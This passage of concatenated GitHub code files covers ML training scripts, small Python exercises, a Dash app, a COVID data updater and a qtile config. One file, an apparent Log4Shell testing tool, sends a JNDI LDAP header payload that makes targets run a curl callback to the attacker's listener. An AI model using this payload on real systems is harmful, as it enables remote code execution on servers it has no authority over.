\"\"\"\n\n # _keys_to_ignore_on_load_missing = [r\"position_ids\"]\n\n def __init__(self, config, loss_function=\"cross-entropy\", smoothing=0.1):\n super().__init__(config)\n\n # There should be at least relevant and non relevant options.\n self.num_labels = config.num_labels\n self.bert = RobertaModel(config)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.classifier = nn.Linear(config.hidden_size, self.num_labels)\n self.loss_fct = nn.CrossEntropyLoss()\n\n self.post_init()\n\n def forward(\n self,\n input_ids_pos=None,\n attention_mask_pos=None,\n token_type_ids_pos=None,\n input_ids_neg=None,\n attention_mask_neg=None,\n token_type_ids_neg=None,\n labels=None\n ):\n # forward pass for positive instances\n outputs_pos = self.bert(\n input_ids_pos,\n attention_mask=attention_mask_pos,\n token_type_ids=token_type_ids_pos\n )\n pooled_output_pos = outputs_pos[1]\n pooled_output_pos = self.dropout(pooled_output_pos)\n logits_pos = self.classifier(pooled_output_pos)\n\n # forward pass for negative instances\n outputs_neg = self.bert(\n input_ids_neg,\n attention_mask=attention_mask_neg,\n token_type_ids=token_type_ids_neg\n )\n pooled_output_neg = outputs_neg[1]\n pooled_output_neg = self.dropout(pooled_output_neg)\n logits_neg = self.classifier(pooled_output_neg)\n\n logits_diff = logits_pos - logits_neg\n\n # Calculating Cross entropy loss for pairs \n # based on \"Learning to Rank using Gradient Descent\" 2005 ICML\n loss = None\n if labels is not None:\n loss = self.loss_fct(logits_diff.view(-1, self.num_labels), labels.view(-1))\n\n output = (logits_pos,) + outputs_pos[2:]\n return ((loss,) + output) if loss is not None else output\n","repo_name":"hadifar/content_selection","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13043348605","text":"#without loops. For checking\ndef binary_search(list, element):\n middle = 0\n start = 0\n end = len(list)\n steps = 0\n\n while(start<=end):\n print(\"Step\", steps, \":\", str(list[start:end+1]))\n\n steps = steps + 1\n middle = (start+end) // 2\n\n if element == list[middle]:\n return middle\n elif element < list[middle]:\n end = middle - 1\n else: #element > list[middle]\n start = middle + 1\n return -1\n\nlist_length = input(\"Longitud lista: \")\nmy_list = [input(\"Valor: \") for x in range(int(list_length))]\ntarget = input(\"target: \")\nbinary_search(my_list, target)","repo_name":"pmunozdl/BeginnersPythonProject","sub_path":"binary search algorithm/python_app2.py","file_name":"python_app2.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19472661116","text":"import os\nimport sys\nimport random\nimport warnings\n\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\nfrom tqdm import tqdm\nfrom itertools import chain\nfrom skimage.io import imread, imshow, imread_collection, concatenate_images\nfrom skimage.transform import resize\nfrom skimage.morphology import label\n\nfrom keras.models import Model, load_model\nfrom keras.layers import Input\nfrom keras.layers.core import Lambda\nfrom keras.layers.convolutional import Conv2D, Conv2DTranspose\nfrom keras.layers.pooling import MaxPooling2D\nfrom keras.layers.merge import concatenate\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, Callback\nfrom keras import backend as K\nimport pdb\nimport tensorflow as tf\n\nimport wandb\nfrom wandb.keras import WandbCallback\n\nwandb.init()\n\n# Set some parameters\nIMG_WIDTH = 128\nIMG_HEIGHT = 128\nIMG_CHANNELS = 3\nTRAIN_PATH = './data/stage1_train/'\nTEST_PATH = './data/stage1_test/'\n\nwarnings.filterwarnings('ignore', category=UserWarning, module='skimage')\nseed = 14\nrandom.seed = seed\nnp.random.seed = seed\nwandb.config.seed = seed\nwandb.config.IMG_WIDTH = IMG_WIDTH\nwandb.config.IMG_HEIGHT = IMG_HEIGHT\nwandb.config.IMG_CHANNELS = IMG_CHANNELS\n\n# Get train and test IDs\ntrain_ids = next(os.walk(TRAIN_PATH))[1]\ntest_ids = next(os.walk(TEST_PATH))[1]\n\n# Get and resize train images and masks\nX_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)\nY_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool)\nprint('Getting and resizing train images and masks ... ')\nsys.stdout.flush()\nfor n, id_ in tqdm(enumerate(train_ids), total=len(train_ids)):\n path = TRAIN_PATH + id_\n img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]\n img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)\n X_train[n] = img\n mask = np.zeros((IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool)\n for mask_file in next(os.walk(path + '/masks/'))[2]:\n mask_ = imread(path + '/masks/' + mask_file)\n mask_ = np.expand_dims(resize(mask_, (IMG_HEIGHT, IMG_WIDTH), mode='constant', \n preserve_range=True), axis=-1)\n mask = np.maximum(mask, mask_)\n Y_train[n] = mask\n\n# Get and resize test images\nX_test = np.zeros((len(test_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)\nsizes_test = []\nprint('Getting and resizing test images ... ')\nsys.stdout.flush()\nfor n, id_ in tqdm(enumerate(test_ids), total=len(test_ids)):\n path = TEST_PATH + id_\n img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]\n sizes_test.append([img.shape[0], img.shape[1]])\n img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)\n X_test[n] = img\n\nprint('Done!')\n\n\n\n# Define IoU metric\ndef mean_iou(y_true, y_pred):\n prec = []\n for t in np.arange(0.5, 1.0, 0.05):\n y_pred_ = tf.to_int32(y_pred > t)\n score, up_opt = tf.metrics.mean_iou(y_true, y_pred_, 2)\n K.get_session().run(tf.local_variables_initializer())\n with tf.control_dependencies([up_opt]):\n score = tf.identity(score)\n prec.append(score)\n return K.mean(K.stack(prec), axis=0)\n\n\n\n# Build U-Net model\ninputs = Input((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS))\ns = Lambda(lambda x: x / 255) (inputs)\n\nc1 = Conv2D(8, (3, 3), activation='relu', padding='same') (s)\nc1 = Conv2D(8, (3, 3), activation='relu', padding='same') (c1)\np1 = MaxPooling2D((2, 2)) (c1)\n\nc2 = Conv2D(16, (3, 3), activation='relu', padding='same') (p1)\nc2 = Conv2D(16, (3, 3), activation='relu', padding='same') (c2)\np2 = MaxPooling2D((2, 2)) (c2)\n\nc3 = Conv2D(32, (3, 3), activation='relu', padding='same') (p2)\nc3 = Conv2D(32, (3, 3), activation='relu', padding='same') (c3)\np3 = MaxPooling2D((2, 2)) (c3)\n\nc4 = Conv2D(64, (3, 3), activation='relu', padding='same') (p3)\nc4 = Conv2D(64, (3, 3), activation='relu', padding='same') (c4)\np4 = MaxPooling2D(pool_size=(2, 2)) (c4)\n\nc5 = Conv2D(128, (3, 3), activation='relu', padding='same') (p4)\nc5 = Conv2D(128, (3, 3), activation='relu', padding='same')(c5)\n# p5 = MaxPooling2D(pool_size=(2, 2)) (c5)\n\n# cx = Conv2D(256, (3, 3), activation='relu', padding='same')(p5)\n# cx = Conv2D(256, (3, 3), activation='relu', padding='same')(cx)\n\n# ux = Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(cx)\n# ux = concatenate([ux, c5])\n# cxx = Conv2D(128, (3, 3), activation='relu', padding='same')(ux)\n# cxx = Conv2D(128, (3, 3), activation='relu', padding='same')(cxx)\n\nu6 = Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same') (c5)\nu6 = concatenate([u6, c4])\nc6 = Conv2D(64, (3, 3), activation='relu', padding='same') (u6)\nc6 = Conv2D(64, (3, 3), activation='relu', padding='same') (c6)\n\nu7 = Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same') (c6)\nu7 = concatenate([u7, c3])\nc7 = Conv2D(32, (3, 3), activation='relu', padding='same') (u7)\nc7 = Conv2D(32, (3, 3), activation='relu', padding='same') (c7)\n\nu8 = Conv2DTranspose(16, (2, 2), strides=(2, 2), padding='same') (c7)\nu8 = concatenate([u8, c2])\nc8 = Conv2D(16, (3, 3), activation='relu', padding='same') (u8)\nc8 = Conv2D(16, (3, 3), activation='relu', padding='same') (c8)\n\nu9 = Conv2DTranspose(8, (2, 2), strides=(2, 2), padding='same') (c8)\nu9 = concatenate([u9, c1], axis=3)\nc9 = Conv2D(8, (3, 3), activation='relu', padding='same') (u9)\nc9 = Conv2D(8, (3, 3), activation='relu', padding='same') (c9)\n\noutputs = Conv2D(1, (1, 1), activation='sigmoid') (c9)\n\nmodel = Model(inputs=[inputs], outputs=[outputs])\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=[mean_iou])\nmodel.summary()\n\ntrain_id = 5\nclass log_images_per_step(Callback):\n def on_epoch_end(self, epoch, logs={}):\n x = X_train[train_id]\n y = Y_train[train_id].astype(np.uint8)*255\n y_pred = self.model.predict(x[np.newaxis,:])\n y_pred_t=(y_pred > 0.5).astype(np.uint8)*255\n wandb.log({\"examples\": [wandb.Image(x, caption=\"x\"),\n wandb.Image(y, caption=\"y\"),\n wandb.Image(y_pred_t, caption=\"pred\")]}, commit=False)\n\n\nwandb.config.val_split = 0.1\nwandb.config.batch_size = 10\nwandb.config.epochs = 20\nwandb.config.patience = 5\nwandb.config.verbose = 1\nprint(\"Training\")\n# Fit model\nearlystopper = EarlyStopping(patience=wandb.config.patience, verbose=wandb.config.verbose)\ncheckpointer = ModelCheckpoint(os.path.join(wandb.run.dir, 'model-dsbowl2018-1.h5'), verbose=1, save_best_only=True)\nresults = model.fit(X_train, Y_train, validation_split=wandb.config.val_split, batch_size=wandb.config.batch_size, epochs=wandb.config.epochs, \n callbacks=[earlystopper, checkpointer, log_images_per_step(), WandbCallback()])","repo_name":"syllogismos/wandb-kaggle-data-bowl-2018","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6737,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"9449831500","text":"## Write a program(function) that takes a list and returns a new list that\r\n## contains all the elements of the first list minus all the duplicates.\r\n## Extras\r\n## Write two different functions to do this-one using a loop and constructing a\r\n## list, and another using sets\r\n## Do Exercise 5 with sets and write the solution for that in a different\r\n## function.\r\n\r\n\r\na = ['a','b','c','a','b','d']\r\n\r\n######## USING FUNCITONS #######\r\ndef lisfun():\r\n newli=[]\r\n for elem in a:\r\n if elem not in newli:\r\n newli.append(elem)\r\n return newli\r\n \r\nprint(lisfun())\r\n\r\n########## USING SETS ##########\r\n\r\n#def setfun():\r\n# setres = set(a)\r\n# newli = list(setres)\r\n# return newli\r\n\r\n#print(setfun())\r\n\r\n","repo_name":"GameroM/Python_Practice1","sub_path":"14_List_Remove Duplicates.py","file_name":"14_List_Remove Duplicates.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8712402790","text":"from dash import dash, dcc, html, Input, Output, State\nfrom dash.exceptions import PreventUpdate\nimport plotly.graph_objects as go\nfrom tabs.weight_tracker import weight_tracker_frame, colors, weight_layout\nimport data_manager\n\napp = dash.Dash(__name__)\napp.title = 'FitApp'\napp.layout = html.Div(children=[\n dcc.Store(id='local_store', storage_type='local'),\n html.Header(className='header', children=[\n html.H1(className='header__title', children='Fit App')\n ]),\n html.Main(className='main', children=[\n weight_tracker_frame(),\n ])\n])\n\n@app.callback(\n [\n Output(component_id='weight_chart', component_property='figure'),\n Output(component_id='weight_button_add', component_property='n_clicks'),\n Output(component_id='weight_button_remove', component_property='n_clicks'),\n Output(component_id='local_store', component_property='data')\n ],\n [\n Input(component_id='weight_button_add', component_property='n_clicks'),\n Input(component_id='weight_button_remove', component_property='n_clicks'),\n ],\n [State(component_id='weight_input', component_property='value'),\n State(component_id='local_store', component_property='data')\n ]\n)\ndef add_new_weight_data(n_clicks_add, n_clicks_remove, weight, store_data):\n\n # if n_clicks_add is None and n_clicks_remove is None: \n # raise PreventUpdate\n new_data = {}\n if n_clicks_remove == 1:\n if store_data:\n data_manager.remove_last_register(store_data['report_time'])\n new_data = {}\n\n if n_clicks_add == 1:\n new_data = data_manager.add_new_data(weight)\n\n weight_df = data_manager.import_data()\n \n q_morning = weight_df['part_of_day'] == 'morning'\n q_evening = weight_df['part_of_day'] == 'evening'\n \n weight_trace_morning = go.Scatter(\n x=weight_df[q_morning]['report_time'],\n y=weight_df[q_morning]['weight'],\n line_color='#dee577',\n name='Morning weight')\n\n weight_trace_evening = go.Scatter(\n x=weight_df[q_evening]['report_time'],\n y=weight_df[q_evening]['weight'],\n line_color='#444cdd',\n name='Evening weight')\n \n trace_morning_mean = go.Scatter(\n x=weight_df[q_morning]['report_time'],\n y=weight_df[q_morning]['weight_roll_mean'],\n line_color='#cc020c',\n name=f'Morning mean weight ({data_manager.ROLLING_PERIODS} days)')\n \n return {'data': [weight_trace_morning, weight_trace_evening, trace_morning_mean], 'layout': weight_layout}, None, None, new_data\n\nif __name__ == '__main__':\n app.run_server(debug=True)","repo_name":"mwisniewski1991/fit_app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31654971714","text":"import unittest\nimport json\nfrom src.sample.student import Student\n\n\n# Testy parametryczne z pliku do niepoprawnych argumentów przy usuwaniu oceny\nclass TestStudentDeleteGrade(unittest.TestCase):\n def setUp(self):\n self.temp = Student(\"Jan\", \"Nowak\", 10, {\"Matematyka\": [4]})\n\n def test_from_file(self):\n file = open(\"../data/data.json\")\n testData = json.load(file)\n file.close()\n for [name, grade, expected] in testData:\n if expected == 1:\n self.assertRaises(ValueError, self.temp.deleteStudentGrade, name, grade)\n elif expected == 2:\n self.assertRaises(Exception, self.temp.deleteStudentGrade, name, grade)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"TestowanieAutomatyczneUG/projekt-i-juliadlutek","sub_path":"tests/test_student_parametrized_file.py","file_name":"test_student_parametrized_file.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36031182074","text":"from email.headerregistry import Group\r\nfrom django.contrib.auth import get_user_model\r\nfrom django.core.management.base import BaseCommand\r\nfrom django.conf import settings\r\n\r\n\r\nclass Command(BaseCommand):\r\n help = \"Creates an admin user non-interactively if it doesn't exist\"\r\n\r\n def handle(self, *args, **kwargs):\r\n superusers = settings.SUPERUSERS\r\n\r\n for superuser in superusers:\r\n User = get_user_model()\r\n if not User.objects.filter(username=superuser[\"USERNAME\"]).exists():\r\n user = User.objects.create_superuser(\r\n username=superuser[\"USERNAME\"],\r\n email=superuser[\"EMAIL\"],\r\n password=superuser[\"PASSWORD\"],\r\n )\r\n\r\n user.groups.set(\r\n [\r\n Group.objects.get_or_create(name=groupname)[0]\r\n for groupname in set(\r\n superuser.get(\"GROUPS\", [])\r\n + [group.name for group in user.groups.all()]\r\n )\r\n ]\r\n )\r\n\r\n user.save()\r\n","repo_name":"jhnnsrs/lok-server","sub_path":"lord/management/commands/ensureadmin.py","file_name":"ensureadmin.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"12610966076","text":"'''----------------------------------------------------------------------------\nName: Update Data Command (update_data.py)\nPurpose: Used to query new data from the Government of Ontario's API, \n Format it appropriately, and add it to the local database \n (database.db)\n\nAuthor: Nicholas Chong\nCreated: 2020-06-23 (YYYY/MM/DD)\n----------------------------------------------------------------------------'''\n\nimport urllib.request\nimport pprint\nimport json\nfrom .models import *\nimport datetime\nimport logging\n\ndef update():\n logging.info('Starting provincial update')\n\n # Get today's date -> Convert it into a string\n todaysdate = str(\n Daily_Report\n .select()\n .order_by(Daily_Report.id.desc())\n .get().date+datetime.timedelta(days=1)\n )\n\n # Access Ontario Government coronavirus API; Search by today's date\n link = f'https://data.ontario.ca/api/3/action/datastore_search?q={todaysdate}&resource_id=ed270bb8-340b-41f9-a7c6-e8ef587e6d11'\n query = urllib.request.urlopen(link)\n query = json.loads(query.read())\n\n sort_function = (\n lambda x: \n datetime.datetime.strptime(x['Reported Date'][0:10], \"%Y-%m-%d\").date()\n )\n sorted_query = sorted(\n query['result']['records'], \n key=sort_function, \n reverse=True\n )\n\n # Isolate today's record and print\n try:\n report = sorted_query[0]\n except:\n return logging.error('Todays record was not found. Unable to complete daily update.')\n\n # Get required data, format and store in variables\n date = (\n datetime.datetime\n .strptime(report['Reported Date'][0:10], \"%Y-%m-%d\")\n .date()\n )\n\n if str(todaysdate) != str(date):\n return logging.error('Todays record was not found. Unable to complete daily update.')\n\n net_new_tests = report['Total tests completed in the last day']\n total_cases = report['Total Cases']\n total_deaths = report['Deaths']\n total_recovered = report['Resolved']\n\n # Query the last row in the database\n past_day = Daily_Report.select().order_by(Daily_Report.id.desc()).get()\n\n # Get net increases in net_new_cases and net_new_deaths\n try:\n net_new_cases = report['Total Cases'] - past_day.total_cases\n except:\n net_new_cases = 0\n\n try:\n net_new_deaths = report['Deaths'] - past_day.total_deaths\n except:\n net_new_deaths = 0\n\n # Create a new Daily_Report and add into database\n Daily_Report.create(\n date=date,\n net_new_cases=net_new_cases,\n net_new_tests= net_new_tests,\n net_new_deaths=net_new_deaths,\n total_cases=total_cases,\n total_deaths=total_deaths,\n total_resolved=total_recovered,\n )\n logging.info('Provincial update complete')\n\n\ndef regional_update():\n logging.info('Starting regional update')\n\n link = 'https://data.ontario.ca/api/3/action/datastore_search?resource_id=8a88fe6d-d8fb-41a3-9d04-f0550a44999f&limit=10000'\n query = urllib.request.urlopen(link)\n query = json.loads(query.read())\n logging.info('Queried data')\n\n sort_function = (\n lambda x: \n datetime.datetime.strptime(x['Date'][0:10], \"%Y-%m-%d\").date()\n )\n sorted_query = sorted(\n query['result']['records'], \n key=sort_function, \n reverse=True\n )\n\n most_recent_record = Daily_Regional_Report.select().order_by(Daily_Regional_Report.Date.desc()).get().Date\n \n if datetime.datetime.strptime(sorted_query[0]['Date'][0:10], \"%Y-%m-%d\").date() != most_recent_record + datetime.timedelta(days=1):\n return logging.error('Todays record was not found. Unable to complete daily update.')\n\n todays_record = sorted_query[0]\n\n Daily_Regional_Report.create(\n Date = todays_record['Date'],\n Algoma_Public_Health_Unit = todays_record['Algoma_Public_Health_Unit'],\n Brant_County_Health_Unit = todays_record['Brant_County_Health_Unit'],\n Chatham_Kent_Health_Unit = todays_record['Chatham-Kent_Health_Unit'],\n Durham_Region_Health_Department = todays_record['Durham_Region_Health_Department'],\n Eastern_Ontario_Health_Unit = todays_record['Eastern_Ontario_Health_Unit'],\n Grey_Bruce_Health_Unit = todays_record['Grey_Bruce_Health_Unit'],\n Haldimand_Norfolk_Health_Unit = todays_record['Haldimand-Norfolk_Health_Unit'],\n Haliburton_Kawartha_Pine_Ridge_District_Health_Unit = todays_record['Haliburton,_Kawartha,_Pine_Ridge_District_Health_Unit'],\n Halton_Region_Health_Department = todays_record['Halton_Region_Health_Department'],\n Hamilton_Public_Health_Services = todays_record['Hamilton_Public_Health_Services'],\n Hastings_and_Prince_Edward_Counties_Health_Unit = todays_record['Hastings_and_Prince_Edward_Counties_Health_Unit'],\n Huron_Perth_District_Health_Unit = todays_record['Huron_Perth_District_Health_Unit'],\n Kingston_Frontenac_and_Lennox_and_Addington_Public_Health = todays_record['Kingston,_Frontenac_and_Lennox_&_Addington_Public_Health'],\n Lambton_Public_Health = todays_record['Lambton_Public_Health'],\n Leeds_Grenville_and_Lanark_District_Health_Unit = todays_record['Leeds,_Grenville_and_Lanark_District_Health_Unit'],\n Middlesex_London_Health_Unit = todays_record['Middlesex-London_Health_Unit'],\n Niagara_Region_Public_Health_Department = todays_record['Niagara_Region_Public_Health_Department'],\n North_Bay_Parry_Sound_District_Health_Unit = todays_record['North_Bay_Parry_Sound_District_Health_Unit'],\n Northwestern_Health_Unit = todays_record['Northwestern_Health_Unit'],\n Ottawa_Public_Health = todays_record['Ottawa_Public_Health'],\n Peel_Public_Health = todays_record['Peel_Public_Health'],\n Peterborough_Public_Health = todays_record['Peterborough_Public_Health'],\n Porcupine_Health_Unit = todays_record['Porcupine_Health_Unit'],\n Region_of_WaterlooPublic_Health = todays_record['Region_of_Waterloo,_Public_Health'],\n Renfrew_County_and_District_Health_Unit = todays_record['Renfrew_County_and_District_Health_Unit'],\n Simcoe_Muskoka_District_Health_Unit = todays_record['Simcoe_Muskoka_District_Health_Unit'],\n Southwestern_Public_Health = todays_record['Southwestern_Public_Health'],\n Sudbury_and_District_Health_Unit = todays_record['Sudbury_&_District_Health_Unit'],\n Thunder_Bay_District_Health_Unit = todays_record['Thunder_Bay_District_Health_Unit'],\n Timiskaming_Health_Unit = todays_record['Timiskaming_Health_Unit'],\n Toronto_Public_Health = todays_record['Toronto_Public_Health'],\n Wellington_Dufferin_Guelph_Public_Health = todays_record['Wellington-Dufferin-Guelph_Public_Health'],\n Windsor_Essex_County_Health_Unit = todays_record['Windsor-Essex_County_Health_Unit'],\n York_Region_Public_Health_Services = todays_record['York_Region_Public_Health_Services'],\n )\n \n logging.info('Regional update complete')\n\n\ndef vaccine_update():\n todaysDate = datetime.datetime.today().date()\n link = f'https://data.ontario.ca/api/3/action/datastore_search?q={str(todaysDate)}T00:00:00&resource_id=8a89caa9-511c-4568-af89-7f2174b4378c'\n query = urllib.request.urlopen(link)\n query = json.loads(query.read())\n\n sort_function = (\n lambda x: \n datetime.datetime.strptime(x['report_date'][0:10], \"%Y-%m-%d\").date()\n )\n sorted_query = sorted(\n query['result']['records'], \n key=sort_function, \n reverse=True\n )\n\n r = sorted_query[0]\n date = datetime.datetime.strptime(r['report_date'][0:10], \"%Y-%m-%d\").date()\n new_doses = r['previous_day_doses_administered'].replace(',', '')\n total_doses = r['total_doses_administered'].replace(',', '')\n\n if date == datetime.datetime.today().date():\n Daily_Vacination.create(\n date=date,\n new_doses=int(new_doses),\n total_doses=int(total_doses)\n )\n","repo_name":"Nicholas-Chong/COVID-19-Twitter-Bot-and-Dashboard","sub_path":"site_data/update_data.py","file_name":"update_data.py","file_ext":"py","file_size_in_byte":8006,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"25790825430","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\nimport datetime\nimport socket \nimport time\nimport requests\nimport os\nimport base64\nimport urllib.parse as urlparse\n\n\n\nhostname=socket.gethostname() \nIPAddr=socket.gethostbyname(hostname)\n\nhostName = IPAddr\nserverPort = 8088\n\nclass MyServer(BaseHTTPRequestHandler):\n def do_GET(self):\n parsed_path = urlparse.urlparse(self.path)\n try:\n params = dict([p.split('=') for p in parsed_path[4].split('&')])\n except:\n params = {}\n \n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n message = f\"{datetime.datetime.now()} {self.client_address[0]}\\n\"\n f = open(f\"./app/{params.get('from').replace('.','-')}.txt\", \"a\")\n print(message)\n f.write(message)\n f.close()\n\n\nif __name__ == \"__main__\": \n webServer = HTTPServer((hostName, serverPort), MyServer)\n print(\"Server started http://%s:%s\" % (hostName, serverPort))\n \n endpoint = os.environ.get('ENDPOINT')\n message = f\"curl -G {IPAddr}:8088 -d 'from={endpoint.split('://')[1].split(':')[0]}'\"\n message_bytes = message.encode('ascii')\n base64_bytes = base64.b64encode(message_bytes)\n base64_message = base64_bytes.decode('ascii')\n headers = { 'X-Api-Version': \"${jndi:ldap://\"+IPAddr+\":1389/Basic/Command/Base64/\"+base64_message+\"}\" }\n time.sleep(10)\n print(headers)\n\n requests.get(url=endpoint, headers=headers)\n try:\n webServer.serve_forever()\n\n \n except KeyboardInterrupt:\n pass\n\n webServer.server_close()\n print(\"Server stopped.\")","repo_name":"Tomermk/AmtiSploit","sub_path":"api/dockers/attackerl4s/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5989264682","text":"import datetime\n\nfrom app.controllers.person_controller import get_person_by_id, create_person\nfrom app.data.db import session\nfrom app.data.models import Person, GenderEnum\nfrom app.data.models import GenderEnum\n\ndef main():\n person = {\n 'first_name': 'Pelle',\n 'last_name': 'Svensson',\n 'birthday': datetime.date(1975, 3, 19),\n 'have_children': True,\n 'street_address': 'Småatan 64',\n 'zip_code': '543 21',\n 'city': 'Småstan',\n 'country': 'Sweden',\n 'phone_number': '+46 795 66 23',\n 'email': 'per@email.com',\n 'gender_id': GenderEnum.MALE\n }\n create_person(person)\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"TeknikhogskolanGothenburg/Genereated_Data","sub_path":"generator/persons.py","file_name":"persons.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16540617519","text":"# EXERCISE 62 : Roulette payouts\n\nfrom random import randrange\n\n# Simulate spinning the wheel, using 37 to represent 00\nvalue = randrange(0, 38)\n\nif value == 37:\n print(\"The spin resulted in 00...\")\nelse:\n print(\"The spin resulted in %d...\" % value)\n\n# Display the payout for single number\nif value == 37:\n print(\"Pay 00\")\nelse:\n print(\"Pay\", value)\n\n\"\"\"\nDisplay the color payout\nThe first line in the condition checks 1, 3, 5, 7 and 9\nThe second line in the condition checks for 12, 14, 16 and 18\nThe third line in the condition checks for 19, 21, 23, 25 and 27\nThe fourth line in the condition checks for 30, 32, 34 and 36\n\"\"\"\n\nif value % 2 == 1 and 1 <= value <= 9 or \\\n value % 2 == 0 and 12 <= value <= 18 or \\\n value % 2 == 1 and 19 <= value <= 27 or \\\n value % 2 == 0 and 30 <= value <= 36:\n print(\"Pay Red\")\nelif value == 0 or value == 37:\n pass\nelse:\n print(\"Pay Black\")\n\n# Display the odd vs even payout\nif 1 <= value <= 18:\n print(\"Pay 1 to 18\")\nelif 19 <= value <= 36:\n print(\"Pay 19 to 36\")\n","repo_name":"AndreaOrlando23/the-python-workbook","sub_path":"Cap_2_DecisionMaking/ex_62.py","file_name":"ex_62.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11351661412","text":"\"\"\"Define qtile screens.\"\"\"\nimport os\n\nfrom libqtile import qtile, widget\nfrom libqtile.bar import Bar\nfrom libqtile.config import Screen\nfrom Xlib import display\n\nfrom . import theme\nfrom .mouse import LEFT\nfrom .widgets.cpu import ColoredCPU\nfrom .widgets.memory import ColoredMemory\nfrom .groups import main_groups\n\n\ndef _strip_app_name(txt: str) -> str:\n shortened = \" - \".join(txt.split(\" - \")[:-1])\n return shortened or txt\n\n\ndef _get_app_name(txt: str) -> str:\n if \"Discord\" in txt:\n return \"Discord\"\n return txt.split(\" \")[0]\n\n\nwidgets = [\n widget.CurrentLayoutIcon(\n padding=0,\n scale=0.7,\n foreground=theme.FOCUSED_COLOR,\n custom_icon_paths=[os.path.expanduser(\"~/.config/qtile/icons\")],\n mouse_callbacks={LEFT: lambda: None}, # disable click on current layout\n ),\n widget.GroupBox(\n active=theme.WHITE,\n block_highlight_text_color=theme.FOCUSED_COLOR,\n borderwidth=0,\n disable_drag=True,\n fontsize=theme.BAR_SIZE - 5,\n highlight_color=theme.FOCUSED_COLOR,\n inactive=theme.GREY,\n margin_x=15,\n this_current_screen_border=theme.BG,\n this_screen_border=theme.MAGENTA,\n urgent_border=theme.URGENT_COLOR,\n urgent_text=theme.URGENT_COLOR,\n use_mouse_wheel=False,\n visible_groups=[group.name for group in main_groups],\n ),\n widget.TaskList(\n border=theme.FOCUSED_COLOR,\n borderwidth=1,\n font=\"FiraCode Nerd Font\",\n icon_size=0,\n margin=1,\n markup_normal=(\n f'{{}}'\n ),\n markup_focused=f'{{}}',\n max_title_width=256,\n parse_text=_strip_app_name,\n unfocused_border=theme.DARK_GREY,\n urgent_border=theme.URGENT_COLOR,\n ),\n widget.Clock(format=\"%B %d ~ %H:%M\"),\n widget.Spacer(),\n widget.Mpris2(\n name=\"spotify\",\n objname=\"org.mpris.MediaPlayer2.spotify\",\n display_metadata=[\"xesam:artist\", \"xesam:title\"],\n scroll_chars=None,\n stop_pause_text=\"\",\n foreground=theme.UNFOCUSED_COLOR,\n ),\n widget.Systray(),\n widget.Sep(size_percent=60, linewidth=2, padding=10),\n widget.TextBox(text=\"﬙\", foreground=theme.BLUE),\n ColoredCPU(\n foreground_alert=theme.URGENT_COLOR,\n format=\"{load_percent}%\",\n mouse_callbacks={LEFT: lambda: qtile.cmd_spawn(\"kitty -e htop\")},\n padding=0,\n ),\n widget.TextBox(text=\"\", foreground=theme.BLUE),\n ColoredMemory(\n foreground_alert=theme.URGENT_COLOR,\n format=\"{MemUsed:.1f}GB\",\n measure_mem=\"G\",\n mouse_callbacks={LEFT: lambda: qtile.cmd_spawn(\"kitty -e htop\")},\n padding=0,\n ),\n]\n\n\ndef _get_num_monitors() -> int:\n disp = display.Display()\n screen = disp.screen().root\n resources = screen.xrandr_get_screen_resources()._data\n ts = resources[\"config_timestamp\"]\n return sum(\n disp.xrandr_get_output_info(output, ts)._data[\"num_preferred\"]\n for output in resources[\"outputs\"]\n )\n\n\nscreens = [\n Screen(top=Bar(widgets=widgets, size=theme.BAR_SIZE, background=theme.BG)),\n]\n\nif _get_num_monitors() > 1:\n screens.append(\n Screen(\n top=Bar(\n widgets=[\n widget.TaskList(\n border=theme.FOCUSED_COLOR,\n borderwidth=1,\n 